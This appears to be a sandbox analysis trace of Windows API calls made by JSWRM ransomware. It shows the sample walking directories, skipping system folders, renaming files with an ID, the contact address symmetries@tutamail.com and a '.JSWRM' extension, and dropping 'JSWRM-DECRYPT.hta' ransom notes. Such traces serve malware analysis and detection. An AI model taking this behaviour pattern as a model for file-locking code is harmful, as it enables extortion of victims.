15 [0068.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.669] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10089634094897608) returned 0 [0068.669] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.669] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.669] CloseHandle (hObject=0xffffffff) returned 1 [0068.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0068.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0068.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0068.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.669] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0068.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.670] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.670] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0068.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.670] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2=".") returned 1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="..") returned 1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="...") returned 1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="windows") returned -1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="recovery") returned 1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="perflogs") returned 1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="documents and settings") returned 1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="$RECYCLE.BIN") returned 1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="system volume information") returned -1 [0068.670] lstrcmpiW (lpString1="sl-SI", lpString2="msocache") returned 1 [0068.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\jswrm-decrypt.hta")) returned 0xffffffff [0068.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.671] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.671] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.672] CloseHandle (hObject=0x454) returned 1 [0068.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\jswrm-decrypt.hta")) returned 0x20 [0068.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.673] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f96e58e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0068.673] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.673] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f96e58e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.673] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.673] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.673] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f96e58e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f96e58e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f96e58e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.674] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.674] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.675] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10092520312917832) returned 0 [0068.675] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.675] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.675] CloseHandle (hObject=0xffffffff) returned 1 [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0068.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0068.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.676] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0068.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.676] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.676] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0068.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.676] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0068.676] 